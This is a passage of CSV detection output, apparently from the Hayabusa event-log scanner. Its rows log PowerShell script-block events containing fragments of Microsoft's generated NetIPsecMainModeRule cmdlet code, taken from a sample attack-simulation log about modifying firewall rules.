[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(Para",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
